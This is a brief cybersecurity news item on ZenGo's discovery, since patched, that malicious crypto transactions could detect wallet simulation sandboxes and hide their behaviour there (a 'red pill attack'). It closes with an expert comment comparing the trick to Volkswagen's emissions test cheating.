Transaction simulation exploitation.
N2K logoMar 22, 2023

Cryptocurrency security vulnerabilities have since been patched.

Transaction simulation exploitation.

Researchers at crypto wallet provider ZenGo discovered vulnerabilities in leading transaction simulation solutions.

Malware could detect sandbox emulations.

Transaction simulations are used to perform sandbox emulations to “evaluate the potential outcome of the intended transaction” before executing them, primarily to combat theft and scams. The researchers found that malware could detect that it was operating in a sandbox, and then “reveal its true malicious nature only when actually executed in a real environment.” The researchers dubbed this a “red pill attack,” since the malware knows it’s in a simulated environment.

The researchers note that “all vendors were very receptive to our reports, and most of them were quick to fix their faulty implementations.” Some vendors, including Coinbase, awarded ZenGo with bug bounties.

Industry comment.

Jeff Williams, co-founder and CTO at Contrast Security, offered the following observations:

“The problems associated with ‘red pill’ utilization in software aren’t new. Volkswagen got in trouble when their car software detected that emissions were being EPA tested and adjusted their engine performance to pass the test.  When running without the ‘red pill’ settings, Volkswagen cars would output up to 40x the allowed emissions.

 "There are an incalculable number of ways that software can detect the environment that it is running in. These include environment variables, IP address, configuration, performance characteristics, and data values just to name a few.  Any of them could be used as a ‘red pill’ and allow the attacker to suppress their attacks until it can ensure it is in a production environment.

"The real question is what to do about it. I think it’s unlikely that security tools will be able to reliably detect when malware uses red pills, both because of the huge variety of signals as well as the legitimate need to detect test environments.”